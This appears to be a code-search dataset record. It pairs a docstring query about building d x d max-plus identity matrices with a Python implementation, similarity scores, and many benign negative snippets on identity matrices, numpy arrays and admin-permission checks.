try:\n return ctypes.windll.shell32.IsUserAnAdmin()\n except:\n return \"Could not get the UAC level.\"", "def check_if_admin(bot, update, *args, **kwargs):\n user_id = update._effective_user\n # print(\"cerco user con id \" + str(user_id) + \", nel database\")\n user = DB.execute(TABELLE[\"id_users\"][\"select\"][\"from_id\"], (user_id['id'],))\n # print(\"ho trovato : \" + str(user))\n if not user:\n self.request_access(bot, user_id)\n return\n elif user[\"banned\"]:\n update.message.reply_text(\"Spiacente sei stato bannato dal bot\")\n return\n elif user[\"admin\"]:\n sig = signature(func)\n if len(sig.parameters) > 1:\n return func(bot, update, *args, **kwargs)\n else:\n return func(*args, **kwargs)\n else:\n update.message.reply_text(\"Non sei abilitato ad usare questo comando\")\n return", "def admin(request):\n if not request.user.is_staff:\n return render(request, 'manager/denied.html')\n return render(request, 'manager/index.html')", "def test_user_isnt_admin():\n app = create_ctfd()\n with app.app_context():\n register_user(app)\n client = login_as_user(app)\n for page in ['pages', 'teams', 'scoreboard', 'chals', 'statistics', 'config']:\n r = client.get('/admin/{}'.format(page))\n assert r.location.startswith(\"http://localhost/login?next=\")\n assert r.status_code == 302\n destroy_ctfd(app)", "def test_func(self):\n return self.request.user.is_superuser", "async def test_auth_admin_is_admin(app):\n # Admin user defined in MockPAMAuthenticator.\n name = 'admin'\n user = add_user(app.db, app, name=name, admin=False)\n assert user.admin is False\n cookies = await app.login_user(name)\n assert user.admin is True", "def is_staff(self):\n return self.is_admin", "def is_staff(self):\n return self.is_admin" ]
[ "0.8688236", "0.8687356", "0.8556875", "0.8554287", "0.85044616", "0.84716874", "0.8450938", "0.841185", "0.84050906", "0.8394017", "0.8363089", "0.83423585", "0.83161926", "0.8280715", "0.82797027", "0.82743096", "0.82743096", "0.8248748", "0.82192075", "0.8196186", "0.8167282", "0.81253445", "0.81230384", "0.81167454", "0.8113847", "0.8090466", "0.80842537", "0.8070545", "0.80473363", "0.80244833", "0.80222696", "0.80142", "0.7963673", "0.7962265", "0.7962265", "0.79258263", "0.7924748", "0.7910106", "0.7880401", "0.7865896", "0.7852999", "0.78060323", "0.7799159", "0.7760705", "0.7748111", "0.7722419", "0.7708694", "0.77079415", "0.7675929", "0.7661388", "0.76584923", "0.7632804", "0.7627969", "0.762729", "0.76091015", "0.7595937", "0.75892967", "0.75881845", "0.75832874", "0.7583276", "0.755741", "0.75534755", "0.7529439", "0.75187206", "0.7501087", "0.7493089", "0.74736077", "0.746824", "0.745469", "0.7451439", "0.7437464", "0.7410849", "0.74057436", "0.73977953", "0.7370247", "0.73670954", "0.7356686", "0.7356686", "0.73216", "0.7273192", "0.7273192", "0.7266639", "0.725893", "0.7247856", "0.7245229", "0.7223091", "0.7207827", "0.7207159", "0.7194789", "0.7191841", "0.71648115", "0.7158346", "0.71554595", "0.71331006", "0.710514", "0.7103049", "0.70620286", "0.70268095", "0.7017761", "0.7008628", "0.7008628" ]
0.0
-1
r""" Return the ``d x d`` identity matrices on ``nvar`` variables.
def symbolic_max_plus_identity(d, nvar, ch=None): d = int(d) nvar = int(nvar) V = FreeModule(ZZ, nvar) e = () zero = (V([0]*nvar),) data = [[zero if i == j else e for j in range(d)] for i in range(d)] return SymbolicMaxPlusMatrix(d, nvar, data, ch)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def identity_matrix(self, n):\r\n IdM = self.zeros_matrix(n, n)\r\n for i in range(n):\r\n IdM[i][i] = 1.0\r\n \r\n return IdM", "def identity(n):\r\n I = np.zeros((n, n))\r\n diag = np.ones(n)\r\n np.fill_diagonal(I, diag)\r\n return matrix(I)", "def identity_matrix(n):\n data = [[1 if c == r else 0 for c in range(n)] for r in range(n)]\n return Matrix(data)", "def matIxs( n ):\n rows, cols = np.indices( (n,n) )\n row = rows.flatten()\n col = cols.flatten()\n \n return map( lambda x: Vector( x[0], x[1] ), zip( col, row ) )", "def I(n):\n identity = Matrix(n,n)\n print identity.matrix\n index = 0 \n for i in range(identity.nrows):\n for j in range(identity.ncols):\n identity.matrix[i][index] = 1\n index += 1\n\n\n flat = []\n for i in range(identity.nrows):\n for j in range(identity.ncols):\n flat.append(identity.matrix[i][j])\n\n\n return identity", "def identity_matrix(n):\n I = zeros_matrix(n, n)\n for i in range(n):\n I[i][i] = 1.0\n\n return I", "def identity_matrix(n):\n I = zeros_matrix(n, n)\n for i in range(n):\n I[i][i] = 1.0\n\n return I", "def identity_matrix(n: int) -> Matrix:\n return make_matrix(n, n, lambda i, j: 1 if i == j else 0)", "def identity_matrix(n: int) -> Matrix:\n return make_matrix(n, n, lambda i, j: 1 if i == j else 0)", "def identity_matrix(n: int) -> Matrix:\n return make_matrix(n, n, lambda i, j: 1 if i == j else 0)", "def identity_matrix():\n return numpy.identity(4)", "def identity_matrix():\r\n return numpy.identity(4)", "def make_numpy_matrix(df,variables):\n observations = []\n for col in variables:\n observations.append(np.array(df[col]))\n observations = np.mat(observations).transpose().A #annoying numpy magic, and Tim loves it\n print observations.shape\n return observations", "def _identity_dense(d, dtype=complex):\n return np.eye(d, dtype=dtype)", "def generate_random_matrix(n):\n return [[random.randint(1, 50) for i in range(n)] for j in range(n)]", "def matEye(n):\n ret=matZeros((n,n))\n for i in range(n):\n matSet(ret,i,i,1)\n return ret", "def eye(cls, n, domain):\n # XXX: flint matrices do not have anything like eye\n return DDM.eye(n, domain).to_dfm()", "def identity(n):\n I = zeroes(n, n)\n for i in range(n):\n I.g[i][i] = 1.0\n return I", "def define_iid_random_variable(rv, num_vars):\n unique_variables = [rv]\n unique_var_indices = [np.arange(num_vars)]\n return IndependentMarginalsVariable(\n unique_variables, unique_var_indices)", "def get_dct_matrix(N):\r\n dct_m = np.eye(N)\r\n for k in np.arange(N):\r\n for i in np.arange(N):\r\n w = np.sqrt(2 / N)\r\n if k == 0:\r\n w = np.sqrt(1 / N)\r\n dct_m[k, i] = w * np.cos(np.pi * (i + 1 / 2) * k / N)\r\n idct_m = np.linalg.inv(dct_m)\r\n return dct_m, idct_m", "def _compute_ind_mat(n, m, nb_coeff):\r\n\r\n ind_mat = np.zeros((nb_coeff, n))\r\n curr_idx = 0\r\n for indexes in itr.combinations_with_replacement(range(m), n):\r\n ind_mat[curr_idx] = np.array(indexes)\r\n curr_idx += 1\r\n\r\n return ind_mat", "def identity(n,dtype=None):\n a = array([1]+n*[0],dtype=dtype)\n b = empty((n,n),dtype=dtype)\n b.flat = a\n return b", "def coordinate_matrix(n):\n xcoordinates = np.zeros((n,n))\n xcoordinates = xcoordinates + np.arange(0,worksize) #broadcasting trick\n ycoordinates = xcoordinates.T\n return np.array([ycoordinates,xcoordinates])", "def create_x_image(n):\n alist = create_diagonal_image(n)\n for i in range(0, n):\n alist[i][i]=1\n alist[i][n-1-i]=1\n return alist", "def idiosyncratic_var_vector(returns, idiosyncratic_var_matrix):\r\n\r\n return pd.DataFrame(np.diag(idiosyncratic_var_matrix), returns.columns)", "def identMatrix(size):\n returnvalue = Matrix()\n for i in range(size):\n newrow = [0] * size\n newrow[i] = 1\n returnvalue.addRow(*newrow)\n return returnvalue", "def direct_obs_matrix(Nx,obs_inds):\n Ny = len(obs_inds)\n H = zeros((Ny,Nx))\n H[range(Ny),obs_inds] = 1\n return H", "def identity(cls,N:int)-> 'Matrix': #note single quotes because this is the class, itself and has not been completely defined yet.\n\n # -------------------------------------------------------\n # TODO: You write this one.\n # I'd suggest that you start by using another method to get a matrix of the right size, and then modify it.\n\n\n I = cls.zeros((N,N))\n for i in range(N):\n I.mat[i][i] = 1\n return I\n\n return Matrix([[\"Not yet written\"]]) # remove this when you add your code.\n # -------------------------------------------------------", "def eye(n,M=None, k=0, dtype=float):\n return asmatrix(np.eye(n,M,k,dtype))", "def build_difs_matrix(xs):\n n = len(xs)\n difs = np.zeros((n, n, 2))\n for row_id in range(n):\n ident = -np.eye(n)\n ident[:, row_id] += 1\n difs[row_id, :, 0] = ident @ xs[:, 0]\n difs[row_id, :, 1] = ident @ xs[:, 1]\n return difs", "def get_matrixS(n):\n\n mat_nxn = np.zeros([n, n], dtype=int)\n for row_num in range(1, n + 1):\n i = row_num - 1\n if row_num == 1:\n mat_nxn[i][i + 1] = 1\n mat_nxn[i][i + 2] = 1\n elif row_num == 2:\n mat_nxn[i][i - 1] = 1\n mat_nxn[i][i + 2] = 1\n elif row_num == n - 1:\n mat_nxn[i][i + 1] = 1\n mat_nxn[i][i - 2] = 1\n elif row_num == n:\n mat_nxn[i][i - 1] = 1\n mat_nxn[i][i - 2] = 1\n elif row_num % 2 == 1:\n mat_nxn[i][i + 1] = 1\n mat_nxn[i][i + 2] = 1\n mat_nxn[i][i - 2] = 1\n elif row_num % 2 == 0:\n mat_nxn[i][i - 1] = 1\n mat_nxn[i][i + 2] = 1\n mat_nxn[i][i - 2] = 1\n mat_nxn = mat_nxn + np.eye(n, dtype=int)\n mat_2nx2n = np.repeat(np.repeat(mat_nxn, 2, 0), 2, 1)\n return torch.as_tensor(mat_2nx2n)", "def generate_positive_semi_definite_matrix(n_dim):\n cov = np.random.randn(n_dim, n_dim)\n return np.dot(cov, cov.T)", "def create_dims(self, n_vec, m_vec):\n dims_mat = np.array([], dtype=np.int64).reshape(2, 0)\n for n in n_vec:\n for m in m_vec[m_vec > n]:\n dims_mat = np.hstack((dims_mat,\n np.array([[n], [m]])))\n return dims_mat", "def to_array(X, n=2):\n return np.array([np.eye(n)[x] for x in X])", "def vars(self):\n return [Var(i,self.dims[i]) for i in range(self.nvar)] # TODO: use stored state info (=1 sometimes)", "def _make_random_matrix(self, n_components, n_features):", "def generate_random_sparse_array(nrows, ncols, numdense):\n i = np.random.randint(0, nrows, numdense)\n j = np.random.randint(0, ncols, numdense)\n data = np.random.randint(1,6, numdense)\n ij = np.vstack((i,j))\n return coo_matrix((data, ij), shape=(nrows, ncols))", "def unfold_grid(var):\n if (len(var.shape)==2): # 2-D variable\n work = N.concatenate((N.zeros((var.shape[0],24),float),var),1)\n work[39:68,0:24] = work[39:68,var.shape[1]:]\n work[39:68,var.shape[1]:] = 0.0\n elif (len(var.shape)==3): # 3-D variable\n work = (N.concatenate((N.zeros((var.shape[0],var.shape[1],24),float),\n var),2))\n work[:,39:68,0:24] = work[:,39:68,var.shape[2]:]\n work[:,39:68,var.shape[2]:] = 0.0\n\n return work", "def create_matrix(n, m):\n matrix = [[None]*m for i in range(n)]\n return matrix", "def createarray(m,n):\n return( np.ones((m,2,n)) )", "def diag_indices(n, ndim=2):\r\n idx = np.arange(n)\r\n return (idx,) * ndim", "def build_toy_dataset(N):\n pi = np.array([0.4, 0.6])\n mus = [[1, 1], [-1, -1]]\n stds = [[0.1, 0.1], [0.1, 0.1]]\n x = np.zeros((N, 2), dtype=np.float32)\n\n for n in range(N):\n k = np.argmax(np.random.multinomial(1, pi))\n x[n, :] = np.random.multivariate_normal(mus[k], np.diag(stds[k]))\n\n return x", "def makeHadamard(n, d):\n return [[1 if d[\"r%dc%d\" % (i, j)] else 0 for j in range(n)] for i in range(n)]", "def irandmatrix(n, range = 10):\n A = mp.matrix(n, n)\n for i in xrange(n):\n for j in xrange(n):\n A[i,j]=int( (2 * mp.rand() - 1) * range)\n return A", "def reshape_var(var):\n dims = np.shape(var)\n nx = dims[0]\n ny = dims[1]\n nz = dims[2]\n\n var_2d = var.reshape(nx * ny, nz)\n return var_2d", "def Dinvmatrix(N):\r\n import numpy as np\r\n D = np.zeros((N,N,2))\r\n D[:,:,0] = np.diag((np.append(np.ones((1,int(N/2))),np.zeros((1,int(N/2))))))\r\n D[:,:,1] = np.diag((np.append(np.zeros((1,int(N/2))),np.ones((1,int(N/2))))))\r\n return D", "def normal(n):\n m=np.zeros((n,n))\n for i,j in itertools.product(range(n), range(n)):\n m[i][j]=normalvariate(0,1)\n return m", "def init(nvars, shape, dtype=float, masked=True):\n fun = ma.zeros if masked else np.zeros\n for _ in range(nvars):\n yield fun(shape, dtype=dtype)", "def makeIncidenceMatrix(self, variable, token, mechanism, network):\n model = self.model\n size = self.size_of_variable( variable )\n mat = np.zeros(size)\n for i, (label, node) in enumerate(model.nodes.items()):\n if node.named_network in self.nw_nnw_dict[network]:\n for j, (arc_label, arc) in enumerate(model.arcs.items()):\n if str(node.label) == str(arc.source) and mechanism == arc.mechanism:\n mat[i, j] = -1.\n elif str(node.label) == str(arc.sink) and mechanism == arc.mechanism:\n mat[i, j] = 1.\n return mat", "def idiosyncratic_var_matrix(returns, factor_returns, factor_betas, ann_factor):\r\n residuals_ = returns - pd.DataFrame(np.dot(factor_returns, factor_betas.T), index=returns.index, columns=returns.columns)\r\n return pd.DataFrame(np.diag(residuals_.var(axis=0, ddof=1) * ann_factor),returns.columns,returns.columns)", "def make_matrix(n):\n #number that makes up the matrix depending on value of n\n num = 1/n**2\n #creates a blur box as a dictionary\n blur_box = {'height': n, 'width': n, 'pixels': [num]*n**2 }\n return blur_box", "def gen_mats(seed, shape, n=4, fmt=\"csr\", density=0.1):\n\n np.random.seed(seed)\n dens = density * np.random.random()\n mats = [sp.random(*shape, density=dens, format=fmt) for i in range(n)]\n return mats", "def get_extremist_network(Nx, Dx):\n N = np.zeros([Nx, Nx], dtype=int)\n\n for i in range(0, Nx): # Iterate over the upper diagonal only\n for j in range(i+1, Nx):\n r = rg.random() # r is in [0.0, 1.0)\n if r <= Dx:\n N[i][j] = 1\n N[j][i] = 1\n return N", "def generate_matrix(size) -> np.ndarray:\n np.random.seed(1)\n return np.random.rand(size, size) - 0.5", "def get_identity(l):\n identity = np.zeros((l, l))\n for i in range(l):\n identity[i][i] = 1\n return identity", "def idensity(n):\n I = zeroes(n, n)\n for i in range(n):\n I.g[i][i] = 1.0\n return I", "def var(self,i): # TODO: change to property to access (read only?) X?\n return Var(i,self.dims[i])", "def xn_xn_prod(self,x_n):\n \n x_n_tiled =T.tile(x_n,(self.num_vars,1))\n \n return T.transpose(x_n_tiled)*x_n_tiled", "def init_matrix(x_dim = 10, y_dim = 10):\n ret = np.zeros((x_dim, y_dim))\n x_rand = np.random.randint(0, x_dim - 1)\n y_rand = np.random.randint(0, y_dim - 1)\n ret[x_rand, y_rand] = 1\n\n return(ret)", "def get_multivariate_matrix(x_data, D):\n rows = []\n terms = get_polynomial(['x1', 'x2', 'x3', 'x4', 'x5'], D)\n for row in range(len(x_data)):\n row_data = {}\n row_data['x1'] = x_data[row, 0]\n row_data['x2'] = x_data[row, 1]\n row_data['x3'] = x_data[row, 2]\n row_data['x4'] = x_data[row, 3]\n row_data['x5'] = x_data[row, 4]\n \n row_entry = []\n for t in terms:\n prod = 1\n for var in t:\n prod *= row_data[var]\n row_entry.append(prod)\n \n row_entry = np.array(row_entry) \n rows.append(row_entry)\n return np.vstack(rows)", "def nvar(self):\n return self.h.shape[0]", "def make_synthetic_matrix(n_features, n_samples, sparsity=.98, random_state=0):\n prng = check_random_state(random_state)\n prec = make_sparse_spd_matrix(n_features, alpha=sparsity,\n smallest_coef=.4, largest_coef=.7,\n random_state=prng)\n cov = linalg.inv(prec)\n d = np.sqrt(np.diag(cov))\n cov /= d\n cov /= d[:, np.newaxis]\n prec *= d\n prec *= d[:, np.newaxis]\n X = prng.multivariate_normal(np.zeros(n_features), cov, size=n_samples)\n X -= X.mean(axis=0)\n X /= X.std(axis=0)\n # Estimate the covariance\n emp_cov = np.dot(X.T, X) / n_samples\n return emp_cov, prec", "def makeIdentity(m):\n Matrix.validate_dimensions(m, m)\n data = [[1 if i == j else 0 for j in range(m)] for i in range(m)]\n return IntegerMatrix(m, m, data)", "def _instantiate_vars(labels: np.ndarray):\n n = len(labels)\n if len(set(labels)) == n:\n index_seed = np.arange(n)\n index_remain = np.arange(n)\n else:\n index_seed = np.argwhere(labels >= 0).ravel()\n index_remain = np.argwhere(labels < 0).ravel()\n labels = labels[index_seed]\n return index_seed.astype(np.int32), index_remain.astype(np.int32), labels.astype(np.int32)", "def crear_matrix(nxn):\n matrix =[]\n for i in range(nxn):\n matrix.append([])\n for e in range(nxn):\n matrix[i].append(\"\")\n return matrix", "def simulator(n, mu, covmat):\n a = np.random.multivariate_normal(mu, covmat, n)\n return [tuple(a[i, :]) for i in range(n)]", "def generate_sparse_randn(n, s):\n x = np.zeros(n)\n I = np.random.randint(0, n, s)\n x[I] = np.random.randn(s)\n return x", "def _defineNAVars(self, vars):\n self.na_dict[\"NV\"] = len(vars)\n self.na_dict[\"VNAME\"] = []\n self.na_dict[\"VMISS\"] = []\n self.na_dict[\"VSCAL\"] = []\n self.na_dict[\"V\"] = []\n\n for var in vars:\n name = xarray_utils.getBestName(var)\n self.na_dict[\"VNAME\"].append(name)\n miss = xarray_utils.getMissingValue(var)\n miss = self._resolve_float(miss)\n\n self.na_dict[\"VMISS\"].append(miss)\n self.na_dict[\"VSCAL\"].append(1)\n\n # Populate the variable list with the array\n # Make sure missing values are converted to real values using the required missing value\n self.na_dict[\"V\"].append(xarray_utils.getArrayAsList(var, missing_value=miss, handle_datetimes=True))\n\n # Create independent variable info\n if not \"X\" in self.na_dict:\n\n # Set up lists ready to populate with values\n self.na_dict[\"NXDEF\"] = []\n self.na_dict[\"NX\"] = []\n\n self.ax0 = xarray_utils.get_coord_by_index(var, 0)\n\n self.na_dict[\"X\"] = [xarray_utils.getArrayAsList(self.ax0)]\n self.na_dict[\"XNAME\"] = [xarray_utils.getBestName(self.ax0)]\n\n if len(self.ax0) == 1:\n self.na_dict[\"DX\"] = [0]\n else:\n # Set default increment as gap between first two\n incr = xarray_utils.get_interval(self.ax0, 0, 1)\n\n self.na_dict[\"DX\"] = [incr]\n # Now overwrite it as zero if non-uniform interval in axis\n\n for i in range(1, len(self.ax0)):\n if xarray_utils.get_interval(self.ax0, i-1, i) != incr:\n self.na_dict[\"DX\"] = [0]\n break\n\n # If 1D only then \"X\" should only be a list and not list of lists\n if self.na_dict[\"FFI\"] in (1001, 1010, 1020):\n self.na_dict[\"X\"] = self.na_dict[\"X\"][0]\n\n # If FFI is 1020 need to reduce axis down to reduced values as most are implied\n if self.na_dict[\"FFI\"] == 1020: \n vals = self.na_dict[\"X\"]\n self.na_dict[\"X\"] = vals[0:len(vals):self.na_dict[\"NVPM\"]] \n\n # Now add the rest of the axes to the self.na_dict objects \n for axis in xarray_utils.getAxisList(var)[1:]:\n self._appendAxisDefinition(axis)\n\n # If FFI is 2110 then need to modify the \"NX\" and \"X\" lists to cope with odd shape\n # Also need to add NX to auxiliary variables\n if self.na_dict[\"FFI\"] == 2110:\n new_x = []\n new_nx = []\n ax2_values = xarray_utils.get_coord_by_index(var, 1).data.tolist()\n\n for i in self.ax0[:]:\n new_x.append([i, ax2_values])\n new_nx.append(len(ax2_values))\n\n # Re-assign to new lists\n self.na_dict[\"NX\"] = new_nx\n self.na_dict[\"X\"] = new_x \n\n # Now auxiliary variable info here with independent var info\n # First aux var is NX\n self.na_dict[\"A\"] = [self.na_dict[\"NX\"][:]]\n ind_var_name = self.na_dict[\"XNAME\"][0]\n self.na_dict[\"ANAME\"] = [\"Number of '%s' values recorded in subsequent data records\" % ind_var_name]\n self.na_dict[\"AMISS\"] = [-9999.999]\n self.na_dict[\"ASCAL\"] = [1.0]\n\n # If FFI is 2310 then need to modify na_dict items for that\n elif self.na_dict[\"FFI\"] == 2310:\n new_x = []\n new_nx = []\n new_dx = []\n ax2_values = xarray_utils.get_coord_by_index(var, 1).data.tolist()\n incr = xarray_utils.get_interval(ax2_values, 0, 1)\n\n for i in self.ax0[:]:\n new_x.append([i, ax2_values])\n new_nx.append(len(ax2_values))\n new_dx.append(incr)\n\n # Re-assign to new lists\n self.na_dict[\"NX\"] = new_nx\n self.na_dict[\"X\"] = new_x\n self.na_dict[\"DX\"] = new_dx\n\n # Now auxiliary variable info here with independent var info\n # First three aux vars are NX, X0 and DX\n self.na_dict[\"A\"] = []\n self.na_dict[\"A\"].append(self.na_dict[\"NX\"][:])\n self.na_dict[\"A\"].append([i[1][0] for i in self.na_dict[\"X\"]])\n self.na_dict[\"A\"].append(self.na_dict[\"DX\"][:])\n\n ind_var_name = self.na_dict[\"XNAME\"][0]\n self.na_dict[\"ANAME\"] = [\"Number of '%s' values recorded in subsequent data records\" % ind_var_name,\n \"'%s' value for first data point\" % ind_var_name,\n \"'%s' increment\" % ind_var_name]\n self.na_dict[\"AMISS\"] = [-9999.999, -9999.999, -9999.999]\n self.na_dict[\"ASCAL\"] = [1.0, 1.0, 1.0]", "def matrix_generate(n):\n a = np.eye(n)\n max = 0\n for i in range(n):\n for j in range(n):\n a[i][j] = random.randint(0,50)\n a[j][i] = a[i][j]\n if a[i][j] > max:\n max = a[i][j]\n for i in range(n):\n a[i][i] = max * n + random.randint(20,40)\n return np.array(a)", "def build_Xij_inv_matrix(self,Nmesh=64):\n H0, F = self.cosmo.H0, self.cosmo.F\n Lbox = self.attrs['Lbox']\n kgrid = initialize_kgrid(Nmesh,Lbox)\n kmag_grid = np.linalg.norm(kgrid,axis=3)\n w_grid = self.cosmo.Pk_lin(kmag_grid)*(1/Lbox**3)*np.exp(-kmag_grid*kmag_grid*self.RG*self.RG)\n k2 = kmag_grid**2\n k2[0,0,0] = 1 \n #----------------------------------------------------\n cspace = np.arange(0,18)\n \n xij_tensor = [[np.sum(np.conj(Hhats[i](kgrid,k2,H0,F))*Hhats[j](kgrid,k2,H0,F)*w_grid)\n for j in cspace[self.cmask]] for i in cspace[self.cmask]]\n \n xij_tensor = np.array(xij_tensor)\n self.xij_tensor_inv = np.linalg.inv(xij_tensor.real)", "def make_matrix():\n row, col = [int(x) for x in input().split()]\n island = [[int(x) for x in input().split()] for _ in range(row)]\n return row, col, island", "def generate_onehot_matrix(n: int = 1024, ndim: int = 8, random_seed: int = None) -> TYPE_ARRAY:\n to_vec = lambda x: [1 if i == x else 0 for i in range(ndim)]\n return numpy.array([to_vec(x) for x in _RNG.randint(0, ndim, n)]).astype(int)", "def __init__(self, n):\n\t\tself._matr = []\n\t\tfor i in range(n):\n\t\t\tself._matr.append([])\n\t\t\tfor j in range(n):\n\t\t\t\tself._matr[i].append(False)", "def _make_random_matrix(self, n_components, n_features):\n #random_state = check_random_state(self.random_state)\n return _gaussian_random_matrix(\n n_components, n_features, random_state=self.random_state\n )", "def make_matrix(sizex, sizey):\n return [[0]*sizey for i in xrange(sizex)]", "def construct_M_N(n):\n n2 = n**2\n D0 = 2*np.ones(n2) # 0th diagonal\n D1 = - np.ones(n2 - 1) # -1st, 1st diagonals\n D1[n-1::n] = 0 # Setting every k*n-1 entries = 0 for k < n\n DN = - np.ones(n2 - n) # -nth, nth diagonals\n return (scipy.sparse.diags((D1, D0, D1), (-1, 0, 1), shape=(n2, n2), format=\"csr\"),\n scipy.sparse.diags((DN, D0, DN), (-n, 0, n), shape=(n2, n2), format=\"csr\"))", "def new_game(n):\n matrix = []\n\n for i in range(n):\n matrix.append([0] * n)\n return matrix", "def get_stain_matrix(I):", "def create_array( n ):", "def FE_create_interaction_vars(df, intxn_vars):\r\n df = df.copy(deep=True)\r\n for (each_intxn1,each_intxn2) in intxn_vars:\r\n new_col = each_intxn1 + '_x_' + each_intxn2\r\n try:\r\n df[new_col] = df[each_intxn1] * df[each_intxn2]\r\n except:\r\n continue\r\n return df", "def make_xyz(df: pd.DataFrame,\n response_var: list,\n fixed_var: list = ['Sex']) -> np.ndarray:\n x = pd.get_dummies(df[fixed_var]).to_numpy()\n x = np.fliplr(x)\n n_animals = df.shape[0] # to fix z the the same shape\n z = np.identity(n_animals)[1]\n y = df[[response_var]].to_numpy()\n\n return x, z, y", "def matrix_initialization(variable):\n # Range of value for 11 and 22\n min_11 = 2.0\n max_11 = 4.5\n # Range of random values for 33\n min_33 = 8.0\n max_33 = 13.0\n # range of values for off-diagonal\n min_offdiag = -0.8\n max_offdiag = 0.8\n\n if variable[-2:] == \"33\":\n return np.round(min_33 + (max_33 - min_33) * np.random.rand(), 1)\n if variable[-1] == variable[-2]:\n return np.round(min_11 + (max_11 - min_11) * np.random.rand(), 1)\n return np.round(min_offdiag + (max_offdiag - min_offdiag) * np.random.rand(), 1)", "def random_transition_matrix(n: int) -> np.ndarray:\n\n x = np.abs(np.random.normal(size=(n, n)))\n rsum = x.sum(axis=1)\n return x / rsum[:, np.newaxis]", "def generate(n):\n \n m1 = np.zeros((n, n), dtype = int)\n m2 = np.zeros((n, n), dtype = int)\n \n for i in range(n):\n for j in range(n):\n m1[i][j] = (j % 32)\n m2[i][j] = (j % 64)\n \n return m1,m2", "def __init__(self, n):\r\n self.matr = []\r\n self.n = n\r\n for i in range(n):\r\n self.matr.append([])\r\n for j in range(n):\r\n self.matr[i].append(False)", "def make_data(n,m):\n I = range(1,n+1)\n J = range(1,m+1)\n x,y,w = {},{},{}\n for i in I:\n x[i] = random.randint(0,100)\n y[i] = random.randint(0,100)\n w[i] = random.randint(1,5)\n return I,J,x,y,w", "def __init__(self, n):\r\n self.size = n\r\n self.mat = []\r\n for i in range(n):\r\n self.mat.append([0] * n)", "def make_matrix(sizex, sizey):\n return [[0] * sizey for i in range(sizex)]", "def create_variable_array(times):\n R=np.empty(np.sum(times))\n return R", "def initial_x():\n\n # RANDOMLY GENERATES the INITIAL VALUES of the independent variables:\n temp = [uniform(1, cfg.n) for i in range(cfg.n)]\n\n return np.array(temp, dtype=np.float_)", "def generate_pos_def(n):\n A = np.random.normal(size=(n,n)) + 1j * np.random.normal(size=(n,n))\n A += np.conjugate(A).T\n # Add just enough of an identity matrix to make all eigenvalues positive\n A += -1.01*np.min(np.linalg.eigvalsh(A))*np.identity(n)\n return A", "def generate_grid(nrows, ncols, ndots):\n\n # Validation\n if nrows * ncols < ndots:\n raise Exception(\"ndots must be <= than grid size\")\n\n rows = np.arange(1, nrows + 1)\n cols = np.arange(1, ncols + 1)\n\n # Create empty matrix\n grid = np.empty((len(rows), len(cols), 2), dtype=np.intp)\n grid[..., 0] = rows[:, None]\n grid[..., 1] = cols \n\n return grid.reshape(nrows * ncols, -1)[:ndots]", "def marginals(self):\n all_variables = [None for ii in range(self.nvars)]\n for ii in range(self.nunique_vars):\n for jj in self.unique_variable_indices[ii]:\n all_variables[jj] = self.unique_variables[ii]\n return all_variables", "def create_matrix(list_of_edges, n):\n matrix = [[0 for i in range(n)] for j in range(n)]\n ind = 0\n for i in range(n):\n for j in range(i):\n matrix[i][j] = list_of_edges[ind]\n matrix[j][i] = list_of_edges[ind]\n ind += 1\n return matrix", "def zeros(m, n):\n data = dict.fromkeys(itertools.product(range(m), range(n)), mpfr(0))\n return MPMatrix((m, n), data)", "def get5x5matrix(self): #modified from nxvasc get3x3matrix()\n try:\n i = na.identity(3)\n \n self.d124 = i.copy()\n self.ds124 = na.zeros(124,na.float64)\n \n for k in range(1,124):\n self.d124 = na.concatenate((self.d124,i))\n# print len(self.d124)\n count = 0\n a = []\n for k in range(-2,3):\n for j in range(-2,3):\n for i in range(-2,3):\n if( i != 0 or j != 0 or k != 0 ):\n self.ds124[count] = math.sqrt(i**2+j**2+k**2)\n count += 1\n a.append(i)\n a.append(j)\n a.append(k)\n# print len(a)\n a = na.reshape(na.array(a),(372,1))\n# print len(self.d124)\n self.d124 = na.concatenate((self.d124,a),axis=1)\n except Exception as error:\n print(\"failed in get5x5matrix(): \", error)", "def random_density_matrix(nqubits: int, dtype=np.complex128) -> np.ndarray:\n rho = random_numpy_hermitian(nqubits, dtype=dtype)\n # Normalize\n ids = np.arange(2 ** nqubits)\n rho[ids, ids] = rho[ids, ids] / np.trace(rho)\n return rho.astype(dtype)", "def generate_pos_def_all_pos(n):\n A = np.random.uniform(size=(n,n))\n A += A.T\n # Add just enough of an identity matrix to make all eigenvalues positive\n A += -1.01*np.min(np.linalg.eigvalsh(A))*np.identity(n)\n return A", "def EmptyStateMat(nX,nU,nY):\n Xx = np.zeros((nX,nX)) # Ac \n Yx = np.zeros((nY,nX)) # Gc \n Xu = np.zeros((nX,nU)) # Xu \n Yu = np.zeros((nY,nU)) # Jc \n return Xx,Xu,Yx,Yu", "def synthesize_data_X(n_x, m, mu_x = sp.random.random(1) * 25, sigma_x = sp.random.random(1) * 25):\n # Create a (1*m) array that represents m examples of a feature x_i.\n x_i = sp.random.normal(mu_x, sigma_x, m).reshape(1, m)\n # Compile all n_x x_i's into a matrix X, dim (n_x * m).\n X = np.matrix(np.array([sp.random.normal(mu_x, sigma_x, m).reshape(1, m)\n for i in range(n_x)])).reshape(n_x, m)\n return X, n_x, m, mu_x, sigma_x", "def create_diagonal_image(n):\n alist = []\n for i in range(0, n):\n alist.append([])\n for j in range(0,n):\n if i ==j:\n alist[i].append(1)\n else:\n alist[i].append(0)\n\n ##########\n # img = create_zeroed_image(n)\n # for i in range(n):\n# for j in range(n):\n# if i == j:\n# img[i][j] = 1\n #######\n \n return alist" ]
[ "0.6807005", "0.63776374", "0.63734645", "0.63494134", "0.6294045", "0.6278014", "0.6278014", "0.61580557", "0.61580557", "0.61580557", "0.615476", "0.6121155", "0.6051036", "0.601457", "0.58180785", "0.5777933", "0.57341456", "0.5717382", "0.5687784", "0.5684385", "0.5680099", "0.5672847", "0.5670253", "0.5622504", "0.5604844", "0.5603232", "0.55817324", "0.55645996", "0.55474067", "0.554359", "0.5521029", "0.5509594", "0.54692394", "0.545146", "0.5449567", "0.5428243", "0.5426758", "0.5412075", "0.54081684", "0.53864765", "0.53850555", "0.53832114", "0.5354908", "0.5350996", "0.5340386", "0.533802", "0.53275317", "0.53251094", "0.5316921", "0.5314654", "0.5308686", "0.5300276", "0.52708554", "0.52675295", "0.52621925", "0.52620864", "0.5251341", "0.52472085", "0.52387774", "0.5229686", "0.522429", "0.5224283", "0.52172196", "0.5205456", "0.5182113", "0.51784873", "0.51711595", "0.51607215", "0.51528317", "0.51524043", "0.5149917", "0.5142965", "0.51321614", 